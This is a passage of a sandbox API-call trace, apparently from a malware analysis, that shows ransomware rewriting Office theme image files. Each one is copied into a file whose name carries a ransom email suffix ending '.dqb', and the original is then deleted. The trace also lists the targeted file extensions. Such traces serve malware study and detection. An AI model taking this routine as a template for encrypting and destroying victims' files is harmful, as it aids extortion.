lpString2=".dqb") returned 1 [0044.178] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.178] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.178] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=1659) returned 1 [0044.178] CloseHandle (hObject=0x1f8) returned 1 [0044.178] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif")) returned 0x20 [0044.178] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.178] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.178] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.179] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.179] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.183] GetLastError () returned 0x0 [0044.183] ReadFile (in: hFile=0x1f8, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x67b, lpOverlapped=0x0) returned 1 [0044.184] WriteFile (in: hFile=0x20c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x680, lpOverlapped=0x0) returned 1 [0044.185] ReadFile (in: hFile=0x1f8, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0044.185] WriteFile (in: hFile=0x20c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.185] SetEndOfFile (hFile=0x20c) returned 1 [0044.185] CloseHandle (hObject=0x20c) returned 1 [0044.186] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.186] SetEndOfFile (hFile=0x1f8) returned 1 [0044.186] CloseHandle (hObject=0x1f8) returned 1 [0044.186] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.187] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif")) returned 1 [0044.187] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0044.187] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0044.187] lstrlenW (lpString=".doc") returned 4 [0044.187] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.187] lstrlenW (lpString=".docx") returned 5 [0044.187] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.187] lstrlenW (lpString=".pdf") returned 4 [0044.187] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.187] lstrlenW (lpString=".xls") returned 4 [0044.187] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.187] lstrlenW (lpString=".xlsx") returned 5 [0044.187] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.187] lstrlenW (lpString=".ppt") returned 4 [0044.187] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.187] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0044.187] lstrlenW (lpString=".zip") returned 4 [0044.187] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.187] lstrlenW (lpString=".rar") returned 4 [0044.187] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.187] lstrlenW (lpString=".bz2") returned 4 [0044.187] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.187] lstrlenW (lpString=".7z") returned 3 [0044.187] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.187] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0044.187] lstrlenW (lpString=".dbf") returned 4 [0044.187] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.187] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0044.187] lstrlenW (lpString=".1cd") returned 4 [0044.187] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0044.188] lstrlenW (lpString=".jpg") returned 4 [0044.188] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0044.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0044.188] lstrlenW (lpString=".doc") returned 4 [0044.188] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.188] lstrlenW (lpString=".docx") returned 5 [0044.188] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.188] lstrlenW (lpString=".pdf") returned 4 [0044.188] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.188] lstrlenW (lpString=".xls") returned 4 [0044.188] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.188] lstrlenW (lpString=".xlsx") returned 5 [0044.188] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.188] lstrlenW (lpString=".ppt") returned 4 [0044.188] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0044.188] lstrlenW (lpString=".zip") returned 4 [0044.188] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.188] lstrlenW (lpString=".rar") returned 4 [0044.188] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.188] lstrlenW (lpString=".bz2") returned 4 [0044.188] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.188] lstrlenW (lpString=".7z") returned 3 [0044.188] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0044.188] lstrlenW (lpString=".dbf") returned 4 [0044.188] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0044.188] lstrlenW (lpString=".1cd") returned 4 [0044.188] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0044.188] lstrlenW (lpString=".jpg") returned 4 [0044.188] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.189] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0044.189] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.189] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0044.375] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=44850) returned 1 [0044.375] CloseHandle (hObject=0x200) returned 1 [0044.375] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png")) returned 0x20 [0044.386] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.393] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.396] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.396] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.401] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.402] GetLastError () returned 0x0 [0044.402] ReadFile (in: hFile=0x1f8, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0xaf32, lpOverlapped=0x0) returned 1 [0044.404] WriteFile (in: hFile=0x174, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xaf40, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xaf40, lpOverlapped=0x0) returned 1 [0044.405] ReadFile (in: hFile=0x1f8, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0044.405] WriteFile (in: hFile=0x174, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.406] SetEndOfFile (hFile=0x174) returned 1 [0044.406] CloseHandle (hObject=0x174) returned 1 [0044.406] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.406] SetEndOfFile (hFile=0x1f8) returned 1 [0044.407] CloseHandle (hObject=0x1f8) returned 1 [0044.407] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.407] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png")) returned 1 [0044.407] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0044.407] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0044.407] lstrlenW (lpString=".doc") returned 4 [0044.407] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.407] lstrlenW (lpString=".docx") returned 5 [0044.407] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.407] lstrlenW (lpString=".pdf") returned 4 [0044.407] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.407] lstrlenW (lpString=".xls") returned 4 [0044.407] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.407] lstrlenW (lpString=".xlsx") returned 5 [0044.408] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.408] lstrlenW (lpString=".ppt") returned 4 [0044.408] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.408] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0044.408] lstrlenW (lpString=".zip") returned 4 [0044.408] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.408] lstrlenW (lpString=".rar") returned 4 [0044.408] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.408] lstrlenW (lpString=".bz2") returned 4 [0044.408] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.408] lstrlenW (lpString=".7z") returned 3 [0044.408] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.408] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0044.408] lstrlenW (lpString=".dbf") returned 4 [0044.408] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.408] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0044.408] lstrlenW (lpString=".1cd") returned 4 [0044.408] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.408] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0044.408] lstrlenW (lpString=".jpg") returned 4 [0044.408] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.408] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0044.408] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0044.408] lstrlenW (lpString=".doc") returned 4 [0044.408] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.408] lstrlenW (lpString=".docx") returned 5 [0044.408] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.408] lstrlenW (lpString=".pdf") returned 4 [0044.408] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.408] lstrlenW (lpString=".xls") returned 4 [0044.408] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.408] lstrlenW (lpString=".xlsx") returned 5 [0044.408] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.408] lstrlenW (lpString=".ppt") returned 4 [0044.408] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.409] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0044.409] lstrlenW (lpString=".zip") returned 4 [0044.409] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.409] lstrlenW (lpString=".rar") returned 4 [0044.409] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.409] lstrlenW (lpString=".bz2") returned 4 [0044.409] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.409] lstrlenW (lpString=".7z") returned 3 [0044.409] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.409] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0044.409] lstrlenW (lpString=".dbf") returned 4 [0044.409] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.409] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0044.409] lstrlenW (lpString=".1cd") returned 4 [0044.409] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.409] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0044.409] lstrlenW (lpString=".jpg") returned 4 [0044.409] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.409] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0044.409] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.409] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.409] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=1339) returned 1 [0044.410] CloseHandle (hObject=0x1f8) returned 1 [0044.410] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif")) returned 0x20 [0044.410] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.410] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.410] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.410] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.410] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0044.412] GetLastError () returned 0x0 [0044.412] ReadFile (in: hFile=0x1f8, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x53b, lpOverlapped=0x0) returned 1 [0044.413] WriteFile (in: hFile=0x200, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x540, lpOverlapped=0x0) returned 1 [0044.414] ReadFile (in: hFile=0x1f8, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0044.414] WriteFile (in: hFile=0x200, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.414] SetEndOfFile (hFile=0x200) returned 1 [0044.414] CloseHandle (hObject=0x200) returned 1 [0044.414] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.415] SetEndOfFile (hFile=0x1f8) returned 1 [0044.415] CloseHandle (hObject=0x1f8) returned 1 [0044.415] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.415] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif")) returned 1 [0044.416] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0044.416] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0044.416] lstrlenW (lpString=".doc") returned 4 [0044.416] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.416] lstrlenW (lpString=".docx") returned 5 [0044.416] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.416] lstrlenW (lpString=".pdf") returned 4 [0044.416] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.416] lstrlenW (lpString=".xls") returned 4 [0044.416] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.416] lstrlenW (lpString=".xlsx") returned 5 [0044.416] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.416] lstrlenW (lpString=".ppt") returned 4 [0044.416] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.416] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0044.416] lstrlenW (lpString=".zip") returned 4 [0044.416] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.416] lstrlenW (lpString=".rar") returned 4 [0044.416] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.416] lstrlenW (lpString=".bz2") returned 4 [0044.416] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.416] lstrlenW (lpString=".7z") returned 3 [0044.416] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.416] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0044.416] lstrlenW (lpString=".dbf") returned 4 [0044.416] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.416] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0044.416] lstrlenW (lpString=".1cd") returned 4 [0044.416] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.416] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0044.416] lstrlenW (lpString=".jpg") returned 4 [0044.416] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0044.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0044.417] lstrlenW (lpString=".doc") returned 4 [0044.417] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.417] lstrlenW (lpString=".docx") returned 5 [0044.417] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.417] lstrlenW (lpString=".pdf") returned 4 [0044.417] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.417] lstrlenW (lpString=".xls") returned 4 [0044.417] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.417] lstrlenW (lpString=".xlsx") returned 5 [0044.417] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.417] lstrlenW (lpString=".ppt") returned 4 [0044.417] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0044.417] lstrlenW (lpString=".zip") returned 4 [0044.417] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.417] lstrlenW (lpString=".rar") returned 4 [0044.417] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.417] lstrlenW (lpString=".bz2") returned 4 [0044.417] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.417] lstrlenW (lpString=".7z") returned 3 [0044.417] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0044.417] lstrlenW (lpString=".dbf") returned 4 [0044.417] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0044.417] lstrlenW (lpString=".1cd") returned 4 [0044.417] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0044.417] lstrlenW (lpString=".jpg") returned 4 [0044.417] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.418] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0044.418] lstrlenW 